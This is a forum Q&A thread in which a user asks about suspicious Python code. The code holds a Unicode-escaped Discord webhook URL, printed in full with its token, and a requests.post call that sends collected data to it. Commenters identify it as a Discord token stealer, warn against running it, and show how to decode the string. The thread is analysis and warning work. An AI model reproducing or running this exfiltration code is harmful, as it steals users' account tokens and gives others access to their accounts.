0

This is the weird code:

slope = "\u0068\u0074\u0074\u0070\u0073\u003a\u002f\u002f\u0063\u0061\u006e\u0061\u0072\u0079\u002e\u0064\u0069\u0073\u0063\u006f\u0072\u0064\u002e\u0063\u006f\u006d\u002f\u0061\u0070\u0069\u002f\u0077\u0065\u0062\u0068\u006f\u006f\u006b\u0073\u002f\u0039\u0032\u0031\u0038\u0039\u0031\u0038\u0030\u0037\u0033\u0038\u0030\u0035\u0032\u0039\u0031\u0037\u0032\u002f\u006b\u0032\u0039\u0061\u0034\u006b\u0039\u0057\u0047\u0059\u006a\u0076\u0046\u0079\u0047\u0038\u0037\u0034\u0050\u005f\u004b\u0073\u0052\u0062\u0042\u0062\u0058\u004b\u005f\u0064\u005a\u0043\u0045\u0071\u0050\u0044\u0056\u005f\u0037\u0053\u0074\u0065\u0036\u006a\u0071\u004a\u0030\u0050\u0031\u0048\u002d\u0051\u004a\u0070\u004b\u0048\u0051\u002d\u0059\u0067\u0070\u0061\u0031\u0050\u0035\u0043\u0053\u0047"

and i found this at the end of the code:

requests.post(slope, data=json.dumps(data), headers={"Content-Type": "application/json"})
Pranav Hosangadi
  • 23,755
  • 7
  • 44
  • 70
SusLos
  • 11
  • 2
  • 5
    That's just a URL, starting with https://canary.discord.com/api/webhooks/, written with Unicode escape sequences to obfuscate it. I would assume an evil purpose to such code, please don't run it. – jasonharper Mar 11 '22 at 03:39
  • I figured it out by the way. It takes your discord token and sends it to a webhook allowing someone to access whatever account that got grabbed. To anyone who might be seeing this. Do not run any file like this one – SusLos Mar 11 '22 at 21:25

1 Answers1

0

I will do magic for you:

slope = "\u0068\u0074\u0074\...\u0053\u0047"
print(slope)

https://canary.discord.com/api/webhooks/921...172/k29a4...a1P5CSG

I hid full output and code by ... marks

In other words

\u0068 is a UTF8 representation for h char

However if you are still using old python2 (I guess not), You have to convert this string into unicode:

unicode(slope, "utf-8")
rzlvmp
  • 7,512
  • 5
  • 16
  • 45